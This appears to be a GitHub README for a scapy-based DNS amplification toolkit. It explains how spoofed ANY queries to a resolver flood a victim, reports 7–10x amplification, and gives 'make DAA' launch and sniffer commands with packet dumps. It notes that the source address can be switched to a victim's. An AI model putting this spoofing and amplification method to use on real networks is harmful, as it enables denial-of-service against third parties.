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DNS Amplification attack

contribute by < ztex > github-Dns-Amplification-Attack


How does it work ?

According to DNS Amplification Attack :

  1. The attacker uses a compromised endpoint to send UDP packets with spoofed IP addresses to a DNS recursor. The spoofed address on the packets points to the real IP address of the victim.
  2. Each one of the UDP packets makes a request to a DNS resolver, often passing an argument such as “ANY” in order to receive the largest response possible.
  3. After receiving the requests, the DNS resolver, which is trying to be helpful by responding, sends a large response to the spoofed IP address.
  4. The IP address of the target receives the response and the surrounding network infrastructure becomes overwhelmed with the deluge of traffic, resulting in a denial-of-service.



In this experience, I firstly develop a toolkit base on pathon scapy which send a UDP/IP packet carry a DNS packet with DNS Resource Record packet. The destination is, which is well-known google DNS server. In the experience phase, the source address is local, but can be easily change to victim address in attack phase.

  • Used for lauching attack
  • Used for sniffing packet to varify


Sending: 70 bytes Receiving: 500~ 700 bytes Amplification is about 7 ~ 10 times


Build virtual environment

virtualenv .

Install necessary packages

pip3 install -r requirement

Lauch attack

make DAA


make sniffer


Send packet

         |###[ DNS Question Record ]### 
         |  qname     = ''
         |  qtype     = ALL
         |  qclass    = IN
        an        = None
        ns        = None
        ar        = None

Are you sure you want to attack ? [Y]/NY
Sent 1 packets.


###[ IP ]### 
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 52
     id        = 1
     flags     = 
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0x608a
     src       =
     dst       =
     \options   \
###[ UDP ]### 
        sport     = domain
        dport     = domain
        len       = 32
        chksum    = 0x9f30
###[ DNS ]### 
           id        = 0
           qr        = 0
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 0
           nscount   = 0
           arcount   = 0
           \qd        \
            |###[ DNS Question Record ]### 
            |  qname     = ''
            |  qtype     = ALL
            |  qclass    = IN
           an        = None
           ns        = None
           ar        = None